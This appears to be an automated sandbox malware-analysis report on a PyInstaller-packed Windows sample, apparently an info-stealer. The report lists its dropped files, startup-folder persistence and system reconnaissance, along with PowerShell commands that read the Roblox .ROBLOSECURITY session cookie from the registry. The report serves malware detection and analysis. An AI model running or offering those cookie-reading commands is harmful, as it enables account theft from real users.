Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: wsapx.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: wsapx.exe

Static file information: File size 7839456 > 1048576

Source: wsapx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: wsapx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: wsapx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: wsapx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: wsapx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: wsapx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: wsapx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: wsapx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: wsapx.exe, 00000002.00000002.2671964478.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: wsapx.exe, 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: wsapx.exe, 00000002.00000002.2670829170.00007FFDA34C1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: wsapx.exe, 00000002.00000002.2672233882.00007FFDA57F7000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: wsapx.exe, wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdb source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: wsapx.exe, 00000002.00000002.2671564113.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: wsapx.exe, 00000002.00000002.2671361825.00007FFDA46D1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: wsapx.exe, 00000002.00000002.2671081584.00007FFDA4331000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: wsapx.exe, 00000002.00000002.2670348004.00007FFDA3421000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdbhP source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006E.00000000.2528171463.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: wsapx.exe, 00000002.00000002.2670091498.00007FFDA33E1000.00000040.00000001.01000000.00000010.sdmp

Source: wsapx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wsapx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wsapx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wsapx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wsapx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 2_2_00007FFD93D97B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFD93D97B30

Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x169f0
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x53022
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x170f7
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x150ed
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x9f7df
Source: wsapx.exe	Static PE information: real checksum: 0x77c476 should be: 0x783a99
Source: python312.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1ca53b
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x192b2f
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xcac1
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x10668
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x226ba
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x9cd5
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x396d1
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x100e6
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x23988
Source: uses4c50.dll.73.dr	Static PE information: real checksum: 0x0 should be: 0x60ef
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1149b

Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD946282D8 push rdi; iretd	2_2_00007FFD946282DA
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94628DBF push rsp; retf	2_2_00007FFD94628DC0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625EB4 push rsp; iretd	2_2_00007FFD94625EB5
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625FB9 push r10; ret	2_2_00007FFD94625FCC
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9462808B push r12; iretd	2_2_00007FFD9462809F
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94627689 push r12; ret	2_2_00007FFD946276CD
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625F7B push r8; ret	2_2_00007FFD94625F83
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625E67 push rdi; iretd	2_2_00007FFD94625E69
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94627F67 push rbp; iretq	2_2_00007FFD94627F68
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625F56 push r12; ret	2_2_00007FFD94625F73
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94626859 push rsi; ret	2_2_00007FFD94626890
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9462763E push rbp; retf	2_2_00007FFD94627657
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94628F42 push rsp; iretq	2_2_00007FFD94628F43
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625C31 push r10; ret	2_2_00007FFD94625C33
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94629327 push rsp; ret	2_2_00007FFD94629328
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625E18 push rsp; ret	2_2_00007FFD94625E1C
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94628419 push r10; retf	2_2_00007FFD94628485
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94627FFF push r12; ret	2_2_00007FFD9462804A
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625F01 push r12; ret	2_2_00007FFD94625F10
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625D06 push r12; ret	2_2_00007FFD94625D08
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625CED push rdx; ret	2_2_00007FFD94625CF7
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625DF7 push r10; retf	2_2_00007FFD94625DFA
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625CE0 push r10; retf	2_2_00007FFD94625CE2
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94625CE5 push r8; ret	2_2_00007FFD94625CEB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD3231D2A5 pushad ; iretd	11_2_00007FFD3231D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD324383FC push ebx; ret	11_2_00007FFD3243847A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD324385FB push ebx; ret	11_2_00007FFD3243860A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD3243860B push ebx; ret	11_2_00007FFD3243860A

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\wsapx.exe

Process created: "C:\Users\user\Desktop\wsapx.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\libcrypto-3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73722\_sqlite3.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\wsapx.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr

Jump to behavior

Source: C:\Users\user\Desktop\wsapx.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
